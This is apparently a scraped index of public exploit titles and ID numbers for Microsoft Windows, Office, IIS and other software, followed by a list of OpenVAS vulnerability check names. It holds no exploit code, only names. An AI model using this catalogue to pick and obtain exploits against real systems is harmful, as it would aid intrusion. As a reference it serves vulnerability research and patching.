AFD.sys Privilege Escalation Exploit (K-plugin) [6732] MS Windows InternalOpenColorProfile Heap Overflow PoC (MS08-046) [6716] MS Windows GDI+ Proof of Concept (MS08-052) #2 [6705] MS Windows 2003 Token Kidnapping Local Exploit PoC [6699] Microsoft PicturePusher ActiveX Cross Site File Upload Attack PoC [6671] MS Windows Vista Access Violation from Limited Account Exploit (BSoD) [6656] MS Windows GDI (EMR_COLORMATCHTOTARGETW) Exploit MS08-021 [6616] MS Windows Explorer Unspecified .ZIP File Denial of Service Exploit [6588] MS Windows GDI+ (.ico File) Remote Division By Zero Exploit [6582] Windows Mobile 6.0 Device long name Remote Reboot Exploit [6565] K-Lite Mega Codec Pack 3.5.7.0 - Local Windows Explorer DoS PoC [6560] MS Windows Wordpad .doc File Local Denial of Service PoC [6463] MS Windows WRITE_ANDX SMB command handling Kernel DoS (meta) [6454] Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053) [6330] Micrsoft Windows GDI (CreateDIBPatternBrushPt) Heap Overflow PoC [6317] Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit [6244] Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC [6181] RealVNC Windows Client 4.1.2 - Remote DoS Crash PoC [6124] Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit [5951] XnView 1.93.6 for Windows .taac Local Buffer Overflow Exploit PoC [5563] TFTP Server for Windows 1.4 ST Remote BSS Overflow Exploit [5530] Microsoft Works 7 WkImgSrv.dll ActiveX Remote BOF Exploit [5518] MS Windows XP SP2 (win32k.sys) Privilege Escalation Exploit (MS08-025) [5460] Microsoft Works 7 WkImgSrv.dll ActiveX Denial of Service PoC [5442] MS Windows GDI Image Parsing Stack Overflow Exploit (MS08-021) [5349] Microsoft Visual InterDev 6.0 (SP6) SLN File Local Buffer Overflow PoC [5327] MS Windows Explorer Unspecified .DOC File Denial of Service Exploit [5320] Microsoft Office XP SP3 PPT File Buffer Overflow Exploit (ms08-016) [5314] TFTP Server for Windows 1.4 ST Buffer Overflow Exploit (0day) [5287] Microsoft Office Excel Code Execution Exploit (MS08-014) [5107] Microsoft Office .WPS File Stack Overflow Exploit (MS08-011) [5087] Microsoft DirectSpeechSynthesis Module Remote Buffer Overflow Exploit [4948] Windows RSH daemon <= 1.8 - Remote Buffer Overflow Exploit [4934] MS Windows Message Queuing Service RPC BOF Exploit (dnsname) [4892] Microsoft Visual InterDev 6.0 (SP6) .sln File Local Buffer Overflow Exploit [4874] Microsoft Rich Textbox Control 6.0 (SP6) SaveFile() Insecure Method [4873] Microsoft FoxServer (vfp6r.dll 6.0.8862.0) ActiveX Command Execution [4866] Microsoft DirectX SAMI File Parsing Remote Stack Overflow Exploit [4760] MS Windows 2000 AS SP4 Message Queue Exploit (MS07-065) [4745] MS Windows Message Queuing Service RPC BOF Exploit (MS07-065) [4702] Windows Media Player 6.4 MP4 File Stack Overflow PoC [4682] Windows Media Player AIFF Divide By Zero Exception DoS PoC [4625] Microsoft Jet Engine MDB File Parsing Stack Overflow PoC [4616] Microsoft Internet Explorer TIF/TIFF Code Execution (MS07-055) [4506] Microsoft Visual FoxPro 6.0 FPOLE.OCX Arbitrary Command Execution [4431] Microsoft Visual Basic Enterprise Edition 6.0 SP6 Code Execution Exploit [4398] Microsoft SQL Server Distributed Management Objects BoF Exploit [4394] Microsoft Visual Studio 6.0 (VBTOVSI.DLL 1.0.0.0) File Overwrite Exploit [4393] Microsoft Visual Studio 6.0 (PDWizard.ocx) Remote Command Execution [4379] Microsoft SQL Server Distributed Management Objects (sqldmo.dll) BoF [4369] Microsoft Visual FoxPro 6.0 (FPOLE.OCX 6.0.8450.0) - Remote PoC [4361] Microsoft Visual Basic 6.0 VBP_Open OLE Local CodeExec Exploit [4337] MS Windows (GDI32.DLL) Denial of Service Exploit (MS07-046) [4325] XAMPP for Windows 1.6.3a Local Privilege Escalation Exploit [4279] Microsoft DXMedia SDK 6 (SourceUrl) ActiveX Remote Code Execution [4259] Microsoft Visual 6 (VDT70.DLL NotSafe) Stack Overflow Exploit [4222] Windows RSH daemon 1.7 - Remote Buffer Overflow Exploit [4215] MS Windows Explorer.exe Gif Image Denial of Service Exploit [4205] TeamSpeak 2.0 (Windows Release) Remote Denial of Service Exploit [4121] Microsoft Excel 2000/2003 Sheet Name Vulnerability PoC [4067] Microsoft Office MSODataSourceControl COM-object BoF PoC (0day) [4066] Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2) [4065] Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4) [4061] Safari 3 for Windows Beta Remote Command Execution PoC [4044] MS Windows GDI+ ICO File - Remote Denial of Service Exploit [4016] Microsoft IIS <= 5.1 Hit Highlighting Authentication Bypass Exploit [3977] Microsoft Visual Basic 6.0 Project (Description) Stack overflow PoC [3976] Microsoft Visual Basic 6.0 Project (Company Name) Stack overflow PoC [3973] Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote DoS Exploit [3965] Microsoft IIS 6.0 (/AUX/.aspx) Remote Denial of Service Exploit [3926] MS Windows Vista - Forged ARP packet Network Stack DoS Exploit [3804] MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017) [3755] MS Windows GDI Local Privilege Escalation Exploit (MS07-017) 2 [3740] MS Windows DNS DnssrvQuery Remote Stack Overflow Exploit [3738] XAMPP for Windows <= 1.6.0a mssql_connect() Remote BoF Exploit [3737] MS Windows DNS RPC Remote Buffer Overflow Exploit (win2k SP4) [3695] MS Windows Animated Cursor (.ANI) Local Overflow Exploit [3693] MS Windows .HLP File Local HEAP Overflow PoC 0day [3690] microsoft office word 2007 - Multiple Vulnerabilities [3688] MS Windows GDI Local Privilege Escalation Exploit (MS07-017) [3684] MS Windows Explorer Unspecified .ANI File Denial of Service Exploit [3652] MS Windows Animated Cursor (.ANI) Overflow Exploit (Hardware DEP) [3651] MS Windows Animated Cursor (.ANI) Universal Exploit Generator [3647] MS Windows Animated Cursor (.ANI) Local Buffer Overflow Exploit [3636] MS Windows Animated Cursor (.ANI) Remote Exploit (eeye patch bypass) [3635] MS Windows XP Animated Cursor (.ANI) Remote Overflow Exploit 2 [3634] MS Windows XP/Vista Animated Cursor (.ANI) Remote Overflow Exploit [3617] MS Windows Animated Cursor (.ANI) Stack Overflow Exploit [3575] Frontbase <= 4.2.7 - Remote Buffer Overflow Exploit (windows) [3544] Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit [3453] MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption [3419] MS Windows (.doc File) Malformed Pointers Denial of Service Exploit [3260] Microsoft Word 2000 Unspecified Code Execution Exploit (0day) [3193] Microsoft Excel Malformed Palette Record DoS PoC (MS07-002) [3190] MS Windows Explorer (AVI) Unspecified Denial of Service Exploit [3176] Microsoft Visual C++ (.RC Resource Files) Local Buffer Overflow Exploit [3159] Microsoft Help Workshop 4.03.0002 (.HPJ) Buffer Overflow Exploit [3149] Microsoft Help Workshop 4.03.0002 (.CNT) Buffer Overflow Exploit [3111] MS Windows Explorer (WMF) CreateBrushIndirect DoS Exploit [3071] Microsoft Vista (NtRaiseHardError) Privilege Escalation Exploit [3052] MS Windows NtRaiseHardError Csrss.exe-winsrv.dll Double Free [3024] MS Windows NtRaiseHardError Csrss.exe Memory Disclosure Exploit [3022] MS Windows ASN.1 - Remote Exploit (MS04-007) [3013] MS Windows NetrWkstaUserEnum() Remote DoS Exploit (0day) [2967] MS Windows (MessageBox) Memory Corruption Local Denial of Service [2935] Windows Media Player 9/10 (MID File) Denial of Service Exploit [2922] Microsoft Word Document (malformed pointer) Proof of Concept [2900] MS Windows DNS Resolution Remote Denial of Service PoC (MS06-041) [2879] MS Windows spoolss GetPrinterData() Remote DoS Exploit (0day) [2809] MS Windows NetpManageIPCConnect Stack Overflow Exploit (py) [2800] MS Windows Wkssvc NetrJoinDomain2 Stack Overflow Exploit (MS06-070) [2789] MS Windows NetpManageIPCConnect Stack Overflow Exploit (MS06-070) [2682] MS Windows NAT Helper Components Remote DoS Exploit (perl) [2672] MS Windows NAT Helper Components (ipnathlp.dll) Remote DoS Exploit [2523] Microsoft Office 2003 PPT Local Buffer Overflow PoC [2412] MS Windows (Windows Kernel) Privilege Escalation Exploit (MS06-049) [2355] MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2k3) [2265] MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2) [2231] Simple Machines Forum <= 1.1 rc2 (lngfile) Remote Exploit (windows) [2223] MS Windows CanonicalizePathName() Remote Exploit (MS06-040) [2210] MS Windows PNG File IHDR Block Denial of Service Exploit PoC (c) (2) [2204] MS Windows PNG File IHDR Block Denial of Service Exploit PoC (c) [2194] MS Windows PNG File IHDR Block Denial of Service Exploit PoC [2162] MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) [2091] Microsoft PowerPoint 2003 SP2 Local Code Execution Exploit (french) [2057] MS Windows Mailslot Ring0 Memory Corruption Exploit (MS06-035) [2056] Microsoft IIS ASP Stack Overflow Exploit (MS06-034) [2054] MS Windows DHCP Client Broadcast Attack Exploit (MS06-036) [2001] Microsoft Word 2000/2003 Unchecked Boundary Condition Vulnerability [1999] Microsoft Word 2000/2003 Hlink Local Buffer Overflow Exploit PoC [1988] Microsoft Excel 2003 Hlink Local Buffer Overflow Exploit (italian) [1986] Microsoft Excel 2000/2003 Hlink Local Buffer Overflow Exploit (french) [1978] Microsoft Excel Universal Hlink Local Buffer Overflow Exploit [1967] MS Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit [1965] MS Windows RRAS RASMAN Registry Stack Overflow Exploit (MS06-025) [1958] Microsoft Excel 2003 Hlink Stack/SEH Buffer Overflow Exploit [1944] Microsoft Excel Unspecified Remote Code Execution Exploit [1940] MS Windows RRAS Remote Stack Overflow Exploit (MS06-025) [1927] Microsoft Excel Unicode Local Overflow Exploit PoC [1911] MS Windows XP/2K (Mrxsmb.sys) Privilege Escalation PoC (MS06-030) [1910] MS Windows (NtClose DeadLock) Vulnerability PoC (MS06-030) [1603] MS Windows XP/2003 - (IGMP v3) Denial of Service Exploit (MS06-007) (2) [1599] MS Windows XP/2003 (IGMP v3) - Denial of Service Exploit (MS06-007) [1584] MS Windows Telephony Service Command Execution Exploit (MS05-040) [1520] MS Windows Media Player Plugin Overflow Exploit (MS06-006)(3) [1506] MS Windows Color Management Module Overflow Exploit (MS05-036) (2) [1505] MS Windows Media Player 10 Plugin Overflow Exploit (MS06-006) [1504] MS Windows Media Player 9 Plugin Overflow Exploit (MS06-006) (meta) [1502] Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (2) [1500] Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) [1495] Microsoft HTML Help Workshop (.hhp file) Buffer Overflow Exploit (3) [1490] Microsoft HTML Help Workshop (.hhp file) Buffer Overflow Exploit (new) [1488] Microsoft HTML Help Workshop (.hhp file) Denial of Service [1470] Microsoft HTML Help Workshop (.hhp file) Buffer Overflow Exploit [1465] MS Windows Services ACLs Local Privilege Escalation Exploit (updated) [1420] MS Windows Metafile (WMF) Remote File Download Exploit Generator [1407] MS Windows 2k Kernel APC Data-Free Local Escalation Exploit (MS05-055) [1396] MS Windows IIS Malformed HTTP Request Denial of Service Exploit (cpp) [1391] Windows XP/2003 Metafile Escape() Code Execution Exploit (meta) [1377] MS Windows IIS Malformed HTTP Request Denial of Service Exploit (pl) [1376] MS Windows IIS Malformed HTTP Request Denial of Service Exploit (c) [1346] MS Windows Metafile (mtNoObjects) Denial of Service Exploit (MS05-053) [1343] MS Windows Metafile (gdi32.dll) Denial of Service Exploit (MS05-053) [1341] MS Windows MSDTC Service Remote Memory Modification PoC (MS05-051) [1328] MS Windows 2k UPNP (getdevicelist) Memory Leak DoS Exploit [1287] GO-Global Windows Server <= 3.1.0.3270 Buffer Overflow (PoC) [1286] GO-Global Windows Clients <= 3.1.0.3270 Buffer Overflow (PoC) [1271] MS Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047) (2) [1269] MS Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047) [1260] MS Windows IIS SA WebAgent 5.2/5.3 Redirect Overflow Exploit (meta) [1198] MS Windows CSRSS Local Privilege Escalation Exploit (MS05-018) [1197] MS Windows (keybd_event) Local Privilege Elevation Exploit [1180] MS Windows Plug-and-Play Service Remote Universal Exploit (french fix) [1179] MS Windows Plug-and-Play Service Remote Universal Exploit (spanish fix) [1178] MS Windows IIS 5.0 (500-100.asp) Server Name Spoof Exploit [1149] MS Windows Plug-and-Play Service Remote Universal Exploit (MS05-039) [1147] Veritas Backup Exec Remote File Access Exploit (windows) [1146] MS Windows Plug-and-Play Service Remote Overflow (MS05-039) [1143] MS Windows XP SP2 (rdpwd.sys) Remote Kernel DoS Exploit [1128] MS Windows (LegitCheckControl.dll) Genuine Advantage Validation Patch [1116] MS Windows Color Management Module Overflow Exploit (MS05-036) [1104] MS Windows Netman Service Local Denial of Service Exploit [1075] MS Windows Message Queuing BoF Universal Exploit (MS05-017) (v.0.3) [1065] MS Windows (SMB) Transaction Response Handling Exploit (MS05-011) [1019] MS Windows COM Structured Storage Local Exploit (MS05-012) [1000] MS Windows XP/2003 - IPv6 Remote Denial of Service Exploit [976] MS Windows WINS Vulnerability and OS/SP Scanner [942] MS Windows Malformed IP Options DoS Exploit (MS05-019) [938] MS Windows (HTA) Script Execution Exploit (MS05-016) [909] MS Windows (WINS) Remote Buffer Overflow Exploit (v.3) [861] MS Windows XP/2003 Remote Denial of Service Exploit [749] MS Windows Improper Token Validation Local Exploit (working) [734] MS Windows NetDDE Remote Buffer Overflow Exploit (MS04-031) [733] MS Windows 2000 WINS Remote Code Execution Exploit [721] MS Windows Kernel ANI File Parsing Crash Vulnerability [640] MS Windows Compressed Zipped Folders Exploit (MS04-034) [585] MS Windows IIS WebDAV XML Denial of Service Exploit (MS04-030) [584] MS Windows Metafile (.emf) Heap Overflow Exploit (MS04-032) [578] MS Windows NNTP Service (XPAT) Denial of Service Exploit (MS04-036) [556] MS Windows JPEG GDI+ All-In-One Bind/Reverse/Admin/FileDownload [480] MS Windows JPEG GDI+ Remote Heap Overflow Exploit (MS04-028) [478] MS Windows JPEG GDI+ Overflow Download Shellcode Exploit (MS04-028) [475] MS Windows JPEG GDI+ Overflow Administrator Exploit (MS04-028) [474] MS Windows JPEG Processing Buffer Overrun Exploit (MS04-028) [472] MS Windows JPEG GDI+ Overflow Shellcoded Exploit [368] MS Windows XP Task Scheduler (.job) Universal Exploit (MS04-022) [366] MS Windows SMS 2.0 - Denial of Service Exploit [355] MS Windows 2k Utility Manager (All-In-One) Exploit (MS04-019) [353] MS Windows 2K/XP Task Scheduler .job Exploit (MS04-022) [352] MS Windows 2000 Universal Language Utility Manager Exploit (MS04-019) [351] MS Windows 2K POSIX Subsystem Privilege Escalation Exploit (MS04-020) [350] MS Windows 2000 Utility Manager Privilege Elevation Exploit (MS04-019) [329] MS Windows NT Crash with an Extra Long Username DoS Exploit [295] MS Windows XP/2K Lsasrv.dll Remote Universal Exploit (MS04-011) [293] MS Windows Lsasrv.dll RPC Remote Buffer Overflow Exploit (MS04-011) [276] MS Windows 2K/XP TCP Connection Reset Remote Attack Tool [275] MS Windows IIS 5.0 SSL Remote buffer overflow Exploit (MS04-011) [271] MS Windows Utility Manager Local SYSTEM Exploit (MS04-011) [268] MS Windows 2000 sp1/sp2 isapi .printer Extension Overflow Exploit (2) [266] MS Windows 2000 sp1/sp2 isapi .printer Extension Overflow Exploit [214] MS Windows (Jolt2.c) Denial of Service Exploit [176] MS Windows IIS SSL Remote Denial of Service Exploit (MS04-011) [163] Eudora 6.0.3 Attachment Spoofing Exploit (windows) [153] MS Windows ASN.1 LSASS.EXE Remote Exploit (MS04-007) [148] MS Windows XP/2003 Samba Share Resource Exhaustion Exploit [135] MS Windows Messenger Service Remote Exploit FR (MS03-043) [130] MS Windows XP Workstation Service Remote Exploit (MS03-049) [123] MS Windows Workstation Service WKSSVC Remote Exploit (MS03-049) [122] MS Windows (ListBox/ComboBox Control) Local Exploit (MS03-045) [119] MS Windows 2000/XP Workstation Service Overflow (MS03-049) [117] MS Windows XP/2000 RPC Remote (non exec memory) Exploit [111] MS Windows Messenger Service Denial of Service Exploit (MS03-043) [109] MS Windows (RPC2) Universal Exploit & DoS (RPC3) (MS03-039) [103] MS Windows (RPC DCOM2) Remote Exploit (MS03-039) [100] MS Windows (RPC DCOM) Long Filename Overflow Exploit (MS03-026) [97] MS Windows (RPC DCOM) Scanner (MS03-039) [92] Microsoft WordPerfect Document Converter Exploit (MS03-036) [86] Real Server 7/8/9 Remote Root Exploit (Windows & Linux) [81] MS Windows 2000 RSVP Server Authority Hijacking PoC Exploit [76] MS Windows (RPC DCOM) Remote Exploit (Universal Targets) [70] MS Windows (RPC DCOM) Remote Exploit (48 Targets) [69] MS Windows RPC DCOM Remote Exploit (18 Targets) [66] MS Windows (RPC DCOM) Remote Exploit (w2k+XP Targets) [65] MS Windows SQL Server Denial of Service Remote Exploit (MS03-031) [64] MS Windows (RPC DCOM) Remote Buffer Overflow Exploit [61] MS Windows 2000 RPC DCOM Interface DoS Exploit [56] MS Windows Media Services (nsiislog.dll) Remote Exploit [51] MS Windows WebDav III remote root Exploit (xwdav) [48] MS Windows Media Services Remote Exploit (MS03-022) [36] MS Windows WebDav II (New) Remote Root Exploit [35] MS Windows IIS 5.0 - 5.1 - Remote Denial of Service Exploit [32] MS Windows XP (explorer.exe) Buffer Overflow Exploit [23] Real Server < 8.0.2 - Remote Exploit (Windows Platforms) [20] MS Windows SMB Authentication Remote Exploit [5] MS Windows RPC Locator Service Remote Exploit [2] MS Windows WebDAV Remote PoC Exploit [1] MS Windows WebDAV (ntdll.dll) Remote Exploit OpenVAS (Nessus) - http://www.openvas.org: [903041] Microsoft Windows Kernel Privilege Elevation Vulnerability (2724197) [903036] Microsoft Windows Networking Components Remote Code Execution Vulnerabilities (2733594) [903035] Microsoft Windows Kernel-Mode Drivers Privilege Elevation Vulnerability (2731847) [903033] Microsoft Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2718523) [902936] Microsoft Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2783534) [902933] Microsoft Windows Shell Remote Code Execution Vulnerabilities (2727528) [902916] Microsoft Windows Kernel Privilege Elevation Vulnerabilities (2711167) [902909] Microsoft Windows Service Pack Missing Multiple Vulnerabilities [902908] Microsoft Windows DirectWrite Denial of Service Vulnerability (2665364) [902906] Microsoft Windows DNS Server Denial of Service Vulnerability (2647170) [902900] Microsoft Windows SSL/TLS Information Disclosure Vulnerability (2643584) [902846] Microsoft Windows TLS Protocol Information Disclosure Vulnerability (2655992) [902845] Microsoft Windows Shell Remote Code Execution Vulnerability (2691442) [902829] Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258) [902807] Microsoft Windows Media Could Allow Remote Code Execution Vulnerabilities (2636391) [902784] Microsoft Windows Object Packager Remote Code Execution Vulnerability (2603381) [902783] Microsoft Windows Kernel Security Feature Bypass Vulnerability (2644615) [902782] MicroSoft Windows Server Service Remote Code Execution Vulnerability (921883) [902766] Microsoft Windows Kernel Privilege Elevation Vulnerability (2633171) [902694] Microsoft Windows IIS FTP Service Information Disclosure Vulnerability (2761226) [902693] Microsoft Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2761226) [902687] Microsoft Windows Data Access Components Remote Code Execution Vulnerability (2698365) [902677] Microsoft Windows Prtition Manager Privilege Elevation Vulnerability (2690533) [902676] Microsoft Windows TCP/IP Privilege Elevation Vulnerabilities (2688338) [902609] Microsoft Windows CSRSS Privilege Escalation Vulnerabilities (2507938) [902598] Microsoft Windows Time Component Remote Code Execution Vulnerability (2618451) [902597] Microsoft Windows Media Remote Code Execution Vulnerability (2648048) [902596] Microsoft Windows OLE Remote Code Execution Vulnerability (2624667) [902588] Microsoft Windows Internet Protocol Validation Remote Code Execution Vulnerability [902566] Microsoft Windows WINS Local Privilege Escalation Vulnerability (2571621) [902516] Microsoft Windows WINS Remote Code Execution Vulnerability (2524426) [902487] Microsoft Windows Active Directory LDAPS Authentication Bypass Vulnerability (2630837) [902484] Microsoft Windows TCP/IP Remote Code Execution Vulnerability (2588516) [902463] Microsoft Windows Client/Server Run-time Subsystem Privilege Escalation Vulnerability (2567680) [902440] Microsoft Windows SMB Server Remote Code Execution Vulnerability (2536275) [902425] Microsoft Windows SMB Accessible Shares [902403] Microsoft Windows Fraudulent Digital Certificates Spoofing Vulnerability [902377] Microsoft Windows OLE Automation Remote Code Execution Vulnerability (2476490) [902337] Microsoft Windows Kernel Elevation of Privilege Vulnerability (2393802) [902290] Microsoft Windows Active Directory SPN Denial of Service (2478953) [902289] Microsoft Windows LSASS Privilege Escalation Vulnerability (2478960) [902281] Microsoft Windows Data Access Components Remote Code Execution Vulnerabilities (2451910) [902280] Microsoft Windows BranchCache Remote Code Execution Vulnerability (2385678) [902277] Microsoft Windows Netlogon Service Denial of Service Vulnerability (2207559) [902276] Microsoft Windows Task Scheduler Elevation of Privilege Vulnerability (2305420) [902269] Microsoft Windows SMB Server NTLM Multiple Vulnerabilities (971468) [902263] Microsoft Windows Media Player Network Sharing Remote Code Execution Vulnerability (2281679) [902262] Microsoft Windows Shell and WordPad COM Validation Vulnerability (2405882) [902256] Microsoft Windows win32k.sys Driver 'CreateDIBPalette()' BOF Vulnerability [902232] Microsoft Windows TCP/IP Privilege Elevation Vulnerabilities (978886) [902231] Microsoft Windows Tracing Feature Privilege Elevation Vulnerabilities (982799) [902227] Microsoft Windows LSASS Denial of Service Vulnerability (975467) [902226] Microsoft Windows Shell Remote Code Execution Vulnerability (2286198) [902094] Microsoft Windows Kernel Mode Drivers Privilege Elevation Vulnerabilities (2160329) [902093] Microsoft Windows Kernel Privilege Elevation Vulnerabilities (981852) [902067] Microsoft Windows Kernel Mode Drivers Privilege Escalation Vulnerabilities (979559) [902033] Microsoft Windows '.ani' file Denial of Service vulnerability [901305] Microsoft Windows IP-HTTPS Component Security Feature Bypass Vulnerability (2765809) [901304] Microsoft Windows File Handling Component Remote Code Execution Vulnerability (2758857) [901301] Microsoft Windows Kerberos Denial of Service Vulnerability (2743555) [901212] Microsoft Windows DirectPlay Remote Code Execution Vulnerability (2770660) [901211] Microsoft Windows Common Controls Remote Code Execution Vulnerability (2720573) [901209] Microsoft Windows Media Center Remote Code Execution Vulnerabilities (2604926) [901205] Microsoft Windows Components Remote Code Execution Vulnerabilities (2570947) [901193] Microsoft Windows Media Remote Code Execution Vulnerabilities (2510030) [901169] Microsoft Windows Address Book Remote Code Execution Vulnerability (2423089) [901164] Microsoft Windows SChannel Denial of Service Vulnerability (2207566) [901163] Microsoft Windows Media Player Remote Code Execution Vulnerability (2378111)) [901150] Microsoft Windows Print Spooler Service Remote Code Execution Vulnerability(2347290) [901140] Microsoft Windows SMB Code Execution and DoS Vulnerabilities (982214) [901119] Microsoft Windows OpenType Compact Font Format Driver Privilege Escalation Vulnerability (980218) [901102] Microsoft Windows Media Services Remote Code Execution Vulnerability (980858) [901065] Microsoft Windows IAS Remote Code Execution Vulnerability (974318) [901064] Microsoft Windows ADFS Remote Code Execution Vulnerability (971726) [901063] Microsoft Windows LSASS Denial of Service Vulnerability (975467) [901048] Microsoft Windows Active Directory Denial of Service Vulnerability (973309) [901012] Microsoft Windows Media Format Remote Code Execution Vulnerability (973812) [900965] Microsoft Windows SMB2 Negotiation Protocol Remote Code Execution Vulnerability [900963] Microsoft Windows Kernel Privilege Escalation Vulnerability (971486) [900957] Microsoft Windows Patterns & Practices EntLib DOS Vulnerability [900956] Microsoft Windows Patterns & Practices EntLib Version Detection [900908] Microsoft Windows Message Queuing Privilege Escalation Vulnerability (971032) [900907] Microsoft Windows AVI Media File Parsing Vulnerabilities (971557) [900886] Microsoft Windows Kernel-Mode Drivers Multiple Vulnerabilities (969947) [900881] Microsoft Windows Indexing Service ActiveX Vulnerability (969059) [900880] Microsoft Windows ATL COM Initialization Code Execution Vulnerability (973525) [900879] Microsoft Windows Media Player ASF Heap Overflow Vulnerability (974112) [900877] Microsoft Windows LSASS Denial of Service Vulnerability (975467) [900876] Microsoft Windows CryptoAPI X.509 Spoofing Vulnerabilities (974571) [900873] Microsoft Windows DNS Devolution Third-Level Domain Name Resolving Weakness (971888) [900838] Microsoft Windows TCP/IP Remote Code Execution Vulnerability (967723) [900814] Microsoft Windows WINS Remote Code Execution Vulnerability (969883) [900757] Microsoft Windows Media Player '.AVI' File DOS Vulnerability [900740] Microsoft Windows Kernel Could Allow Elevation of Privilege (977165) [900568] Microsoft Windows Search Script Execution Vulnerability (963093) [900465] Microsoft Windows DNS Memory Corruption Vulnerability - Mar09 [900404] Microsoft Windows RTCP Unspecified Remote DoS Vulnerability [900336] Microsoft Windows Media Player MID File Integer Overflow Vulnerability [900297] Microsoft Windows Kernel Denial of Service Vulnerability (2556532) [900296] Microsoft Windows TCP/IP Stack Denial of Service Vulnerability (2563894) [900295] Microsoft Windows DNS Server Remote Code Execution Vulnerability (2562485) [900281] Microsoft IE Developer Tools WMITools and Windows Messenger ActiveX Control Vulnerability (2508272) [900280] Microsoft Windows SMB Server Remote Code Execution Vulnerability (2508429) [900266] Microsoft Windows Movie Maker Could Allow Remote Code Execution Vulnerability (2424434) [900263] Microsoft Windows OpenType Compact Font Format Driver Privilege Escalation Vulnerability (2296199) [900248] Microsoft Windows Movie Maker Could Allow Remote Code Execution Vulnerability (981997) [900241] Microsoft Outlook Express and Windows Mail Remote Code Execution Vulnerability (978542) [900240] Microsoft Exchange and Windows SMTP Service Denial of Service Vulnerability (981832) [900237] Microsoft Windows Authentication Verification Remote Code Execution Vulnerability (981210) [900236] Microsoft Windows Kernel Could Allow Elevation of Privilege (979683) [900235] Microsoft Windows Media Player Could Allow Remote Code Execution (979402) [900232] Microsoft Windows Movie Maker Could Allow Remote Code Execution Vulnerability (975561) [900230] Microsoft Windows SMB Server Multiple Vulnerabilities (971468) [900227] Microsoft Windows Shell Handler Could Allow Remote Code Execution Vulnerability (975713) [900178] Microsoft Windows 'UnhookWindowsHookEx' Local DoS Vulnerability [900173] Microsoft Windows Media Player Version Detection [900172] Microsoft Windows Media Player 'MIDI' or 'DAT' File DoS Vulnerability [900108] Microsoft Windows NSlookup.exe Remote Code Execution Vulnerability [803007] Microsoft Windows Minimum Certificate Key Length Spoofing Vulnerability (2661254) [802888] Microsoft Windows Media Service Handshake Sequence DoS Vulnerability [802634] Microsoft Windows Unauthorized Digital Certificates Spoofing Vulnerability (2718704) [802500] Microsoft Windows TrueType Font Parsing Privilege Elevation Vulnerability [802426] Microsoft Windows ActiveX Control Multiple Vulnerabilities (2647518) [802383] Microsoft Windows Color Control Panel Privilege Escalation Vulnerability [802379] Microsoft Windows Kernel 'win32k.sys' Memory Corruption Vulnerability [802260] Microsoft Windows WINS Remote Code Execution Vulnerability (2524426) [802140] Microsoft Explorer HTTPS Sessions Multiple Vulnerabilities (Windows) [802136] Microsoft Windows Insecure Library Loading Vulnerability (2269637) [801991] Microsoft Windows SMB/NETBIOS NULL Session Authentication Bypass Vulnerability [801966] Microsoft Windows ActiveX Control Multiple Vulnerabilities (2562937) [801914] Microsoft Windows IPv4 Default Configuration Security Bypass Vulnerability [801719] Microsoft Windows CSRSS CSRFinalizeContext Local Privilege Escalation Vulnerability (930178) [801718] Microsoft Windows Vista Information Disclosure Vulnerability (931213) [801717] Microsoft Windows Vista Teredo Interface Firewall Bypass Vulnerability [801716] Microsoft Outlook Express/Windows Mail MHTML URI Handler Information Disclosure Vulnerability (929123) [801713] Microsoft Outlook Express And Windows Mail NNTP Protocol Heap Buffer Overflow Vulnerability (941202) [801706] Microsoft Windows TCP/IP Remote Code Execution Vulnerabilities (941644) [801705] Microsoft Windows TCP/IP Denial of Service Vulnerability (946456) [801701] Microsoft Windows DNS Client Service Response Spoofing Vulnerability (945553) [801669] Microsoft Windows IIS FTP Server DOS Vulnerability [801598] Microsoft Windows2k3 Active Directory 'BROWSER ELECTION' Buffer Overflow Vulnerability [801580] Microsoft Windows Fax Cover Page Editor BOF Vulnerabilities [801527] Microsoft Windows 32-bit Platforms Unspecified vulnerabilities [801487] Microsoft Windows Kernel Usermode Callback Local Privilege Elevation Vulnerability (941693) [801486] Microsoft Windows Speech Components Voice Recognition Command Execution Vulnerability (950760) [801484] Microsoft Windows IPsec Policy Processing Information Disclosure Vulnerability (953733) [801483] Microsoft Windows Search Remote Code Execution Vulnerability (959349) [801482] Microsoft Windows ASP.NET Denial of Service Vulnerability(970957) [801479] Microsoft Windows TCP/IP Could Allow Remote Code Execution (974145) [801457] Microsoft Windows Address Book Insecure Library Loading Vulnerability [801456] Microsoft Windows Progman Group Converter Insecure Library Loading Vulnerability [801333] Microsoft Windows Kernel 'win32k.sys' Multiple DOS Vulnerabilities [801090] Microsoft Windows Indeo Codec Multiple Vulnerabilities [800862] Microsoft Windows Kernel win32k.sys Privilege Escalation Vulnerability [800687] Microsoft Windows Server 2003 OpenType Font Engine DoS Vulnerability [800577] Microsoft Windows Server 2003 win32k.sys DoS Vulnerability [800504] Microsoft Windows XP SP3 denial of service vulnerability [800480] Microsoft Windows Media Player '.mpg' Buffer Overflow Vulnerability [800466] Microsoft Windows TLS/SSL Spoofing Vulnerability (977377) [800442] Microsoft Windows GP Trap Handler Privilege Escalation Vulnerability [800332] Microsoft Windows Live Messenger Information Disclosure Vulnerability [800331] Microsoft Windows Live Messenger Client Version Detection [800328] Integer Overflow vulnerability in Microsoft Windows Media Player [800310] Microsoft Windows Media Services nskey.dll ActiveX BOF 